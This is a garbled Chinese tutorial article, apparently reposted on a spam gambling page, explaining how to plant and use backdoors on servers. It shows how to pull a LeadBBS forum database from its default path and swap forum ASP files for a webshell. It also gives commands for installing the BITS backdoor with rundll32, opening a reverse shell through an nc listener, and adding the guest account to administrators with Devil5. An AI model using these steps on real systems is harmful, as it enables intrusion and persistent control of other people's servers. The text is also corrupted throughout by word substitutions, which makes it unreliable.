安全技术 后门程序知识认知与完全解析(2)

  • 时间:
  • 浏览:0
  • 来源:1.5分彩_1.5分彩网投平台_1.5分彩投注平台_1.5分彩娱乐平台





作者: 论坛架构设计 zdnet网络安全

CNETNews.com.cn

60 8-01-12 15:14:03

关键词: 攻击防范 入侵 后门 安全技术

 运用举便

  leadbbs2.77从前风靡网络,它是个很典型的ASP论坛,屏蔽了就是 还需用SQL注入的寺方,因此就是 傻瓜级别的网络管理员老是喜欢默认安装,因此启用论坛,让让让我们 儿只需用很简单地在IE中输入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就要能直接下载该论坛的数据库了,因此这么 MD5加密哦!,让让让我们 儿直接找到管理员的账户和密码,因此登录论坛,到管理界面将论坛的“联系让让让我们 儿”、“帮助”等ASP文件替加上让让让我们 儿的海阳项端代码,因此执行GUEST权限的CMD命令,方便的上传/下载将定系统进程池池、远程执行系统进程池池等,从前有另一个 隐藏的后门就建好了!取得服务器的SYSTEM权限看到让让让我们 儿或多或少人的妙招了。

  一般来讲,海洋的功能是非常强大的,因此不容易被查杀(有另一个 让让让我们 采取的妙招是:先利用某个脚本漏洞上传网页后门,再通过海洋上传从前后门到隐蔽的路径,因此通过最后上传的后门来删除第一次上传的海洋,从前后门的存放路径就还需用放得非常深了,普通管理员是先要发现的),原应管理员真是或多或少人原应中了这后面 样的后门,还需用利用论坛备份来恢复或多或少人的页面系统,再配合系统日志、论坛日志等系统进程池池检查系统,发现可疑ASP文件打开看看海洋是很好识别的,再删除就还需用了。

  脚本方面的后门还有CGI和PHP两面三刀大类,使用原理都差很多,这里就不再多介绍,在黑防论坛也收录了并不是种生活后门,让让让我们 儿还需用下载后或多或少人研究。

  2.系统进程池插入后门

  首先让让让我们 儿来简单解释一下有哪些是典型的"系统进程池插入"后门:并不是后门在运行时这么 系统进程池池,所有网络操作均播入到或多或少应用系统进程池池的系统进程池池中完成。也就是说,即使受控制端安装的防火墙拥有“应用系统进程池池访问权限”的功能,就是能对从前的后门进行有效的警告和拦截,也就使对方的防火墙形同虚设了!并不是后门是现在非常主流的并不是生活,很让防护的人头疼,原应对它的查杀比较困难,并不是后门并不是生活的功能比较强大,是“居中家旅行、入侵攻击”的必备品哦

  类似于的典范就是国内提倡网络共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的让让让我们 使用它的过程中感到了方便。

  BITS

  类型:系统后门

  使用范围:wind60 /xp/60 3

  隐蔽系统进程池池:★★★★☆

  使用难度:★★★☆☆

  危害系统进程池池:★★★★☆

  查杀难度:★★★★☆

  BITS真是是Background Intelligent Transfer Servicer的缩写,还需用在不知不觉中实现另并不是生活意义的典型的系统进程池插入后门,有以下特点:系统进程池池管理器中看我很多 能;平时这么 端口,就是在系统中充当卧底的角色;提供正向连接和反向连接并不是生活功能;仅适合用于windows 60 /xp/60 3。

  运用举例

  首先让让让我们 儿用3389登录上肉鸡,选则你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令:

  rundll32.exe bits.dll,install

  从前就激活了BIST,系统进程池池用并不是社会形态的字符来辨认使用者,也就为宜你的密码了,因此卸载:rundll32.exe BITS.dll,Uninstall

  这是最简单的使用,并不是后门除了隐蔽性好外,还有两大特点是非常 值得借鉴的:端口复用和正反向连接。真是就是 让让让我们 老是听到并不是个 名词,但无须了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如60 、139等,从前的后门有个非常 大的好处就是非常 隐蔽,我很多 或多或少人开端口就是会暴露或多或少人的访问,原应通讯并不是生活就是系统的正常访问!从前是反向连接,并不是很常 见,也是后门中有另一个 经典思路,原应从服务器上主动方问外边是不被禁止的,就是 很历害的防火墙就怕这点!

  BITS的正向连接很简单,让让让我们 儿还需用参考它的README,并不是妙招在服务器这么 防火墙等妙招的后后很管用,还需用方便地连接,因此遇到有防火墙从前的妙招就不灵了,得使用下面的反向连接妙招:

  在本地使用NC监听(如:nc -l -p 1234)

  用NC连接目标主机的任何有另一个 防火墙允许的TCP端口(60 /139/445……)

  输入激活命令::[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]

  目标主机的CMD原应再次出现NC监听的端口2222,从前就实现了绕过防火墙的功能了。

  devil5(魔鬼5号)

  类型:系统后门

  使用范围:win60 /xp/60 3

  隐蔽程度:★★★★☆

  使用难度:★★☆☆☆

  危害系统进程池池:★★★★☆

  查杀难度:★★★☆☆

  同BITS一样,Devil5也是系统进程池插入式的后门,和BITS不同的是它还需用很方便的在GUI界面下按照或多或少人的使用习惯定制端口和需用插入的系统进程池,适合对系统有一定了解的使用都使用,原应是自定义插入系统进程池,就是 它更难被查杀,下面让让让我们 儿来看看它的使用。

  运用举例:

  道德使用它自带的配置系统进程池池EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入系统进程池、连接密码、时间间隔等方面关键点是对插入系统进程池的定制,一般设置成系统自带的SVCHOST,因此运行后门就还需用控制了。

  让让让我们 儿用TELNET连接上去,连接的格式是:TELNET *** 定制的端口,它和或多或少后门不同之存在于连接后这么 提示的界面,每次执行系统进程池池也是分开的,需用要每次都在输入密码,比如让让让我们 儿丢掉了服务器和管账户,还需用激活GUEST后再将GUEST加到管理员权限,记得每次执行命令后加上“>密码”就还需用了:net localgroup administrators guest /add >hkfx,因此你又还需用控制服务器了。

  很明显示,同榕哥的BITS相比,DEVIL5有或多或少存在问题:我很多 能通过系统自带端口通讯、执行命令比较麻烦,需用每次输入密码因此不回显示输入内容,很容易出错。因此,它有或多或少人的优势:插入系统进程池还需用自已定制,比如设置IE的系统进程池为插入的目标就比较难被查杀:或多或少人提供了专门的查杀工具DELDEVIL5.exe,帮助防护者清理系统;因此它还需用任意改名和绑定,使用灵活性上比BITS强……让让让我们 儿选则哪能款看到或多或少人的喜好了。

  另外,PortLess BackDoor等工具也是此类的后门,功能强大,隐蔽性稍差,让让让我们 儿有兴趣还需用或多或少人研究一下。